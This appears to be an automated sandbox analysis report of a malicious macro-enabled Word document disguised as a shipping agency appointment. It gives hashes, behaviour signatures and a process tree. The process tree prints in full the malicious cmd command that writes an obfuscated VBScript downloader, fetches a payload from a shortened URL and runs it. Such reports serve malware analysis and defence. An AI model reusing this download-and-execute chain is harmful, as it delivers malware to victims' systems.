Analysis

  • max time kernel
    131s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    11-03-2021 09:47

General

  • Target

    AGENCY APPOINTMENT MV APPOLLO MEO 30000MT OF STEEL BARS.docm

  • Size

    14KB

  • MD5

    a97a1ed3f0ae65d59ff8224543a7daea

  • SHA1

    14e9cc3489b566173ed6e5a9dc0d1d0442066b60

  • SHA256

    7a5e7acc630e80be187a97fba6037caa36056c12e0f11299d6ee55bed6141fe6

  • SHA512

    08ff34debf744c1ad20ef758aaf74fc6ecb4c86ff6b3e3e4d2fde721054a67163750ab774e7ad4bc699dfcbe187a766140cd88b16992bb7979781ab3f09864e3

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGENCY APPOINTMENT MV APPOLLO MEO 30000MT OF STEEL BARS.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Windows\SysWOW64\CMd.exe
      CMd /c cd %TEMP% & @ECHO L0n= "https://bit.ly/2N6DBnf">>G6m.VBS &@ECHO V6f = L7x("ONb]7NaN")>>G6m.VBS &@ECHO Set Q7n = CreateObject(L7x("V\aVU;7aVUQ]]Y"))>>G6m.VBS &@ECHO Q7n.Open L7x("PN]"), L0n, False>>G6m.VBS &@ECHO Q7n.send ("")>>G6m.VBS &@ECHO Set R8s = CreateObject(L7x("JMXMK7\][NJV"))>>G6m.VBS &@ECHO R8s.Open>>G6m.VBS &@ECHO R8s.Type = 1 >>G6m.VBS &@eCHo R8s.Write Q7n.ResponseBody>>G6m.VBS &@ECHO R8s.Position = 0 >>G6m.VBS &@ECHO R8s.SaveToFile V6f, 2 >>G6m.VBS &@ECHO R8s.Close>>G6m.VBS &@ECHO function L7x(X8d) >> G6m.VBS &@ECHO For Q3w = 1 To Len(X8d) >>G6m.VBS &@ECHO U6w = Mid(X8d, Q3w, 1) >>G6m.VBS &@ECHO U6w = Chr(Asc(U6w)- 9) >>G6m.VBS &@ECHO W4j = W4j + U6w >> G6m.VBS &@ECHO Next >>G6m.VBS &@ECHO L7x = W4j >>G6m.VBS &@ECHO End Function >>G6m.VBS & G6m.VBS &dEl G6m.VBS & tIMeOUT 13 & FEYT.EXE
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\G6m.VBS"
        3⤵
        • Blocklisted process makes network request
        • Modifies system certificate store
        PID:916
      • C:\Windows\SysWOW64\timeout.exe
        tIMeOUT 13
        3⤵
        • Delays execution with timeout.exe
        PID:1596
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1968

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\G6m.VBS

      MD5

      0e90c3f175db18c36c0fafc4da99a74c

      SHA1

      c3a6c670b35af7fe89ab0332b81005a360afe98f

      SHA256

      cf43c585f5ec1cdf81610890bb1efb87c3dac00bb37ac370a8549e585fea94e3

      SHA512

      36d9054192b1b9573c1177b67b79c4bdc565f65f6fd155b4cbc31b1988a119ab444991562aa32924c15b11b2b4b1604a1f9287d4ea25978cf9a8d02bfe44e0d7

    • memory/800-2-0x0000000072E21000-0x0000000072E24000-memory.dmp

      Filesize

      12KB

    • memory/800-3-0x00000000708A1000-0x00000000708A3000-memory.dmp

      Filesize

      8KB

    • memory/800-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/916-7-0x0000000000000000-mapping.dmp

    • memory/916-11-0x0000000002840000-0x0000000002844000-memory.dmp

      Filesize

      16KB

    • memory/1020-10-0x000007FEF69C0000-0x000007FEF6C3A000-memory.dmp

      Filesize

      2.5MB

    • memory/1596-12-0x0000000000000000-mapping.dmp

    • memory/1756-5-0x0000000000000000-mapping.dmp

    • memory/1756-6-0x0000000076C21000-0x0000000076C23000-memory.dmp

      Filesize

      8KB

    • memory/1968-13-0x0000000000000000-mapping.dmp

    • memory/1968-14-0x000007FEFC321000-0x000007FEFC323000-memory.dmp

      Filesize

      8KB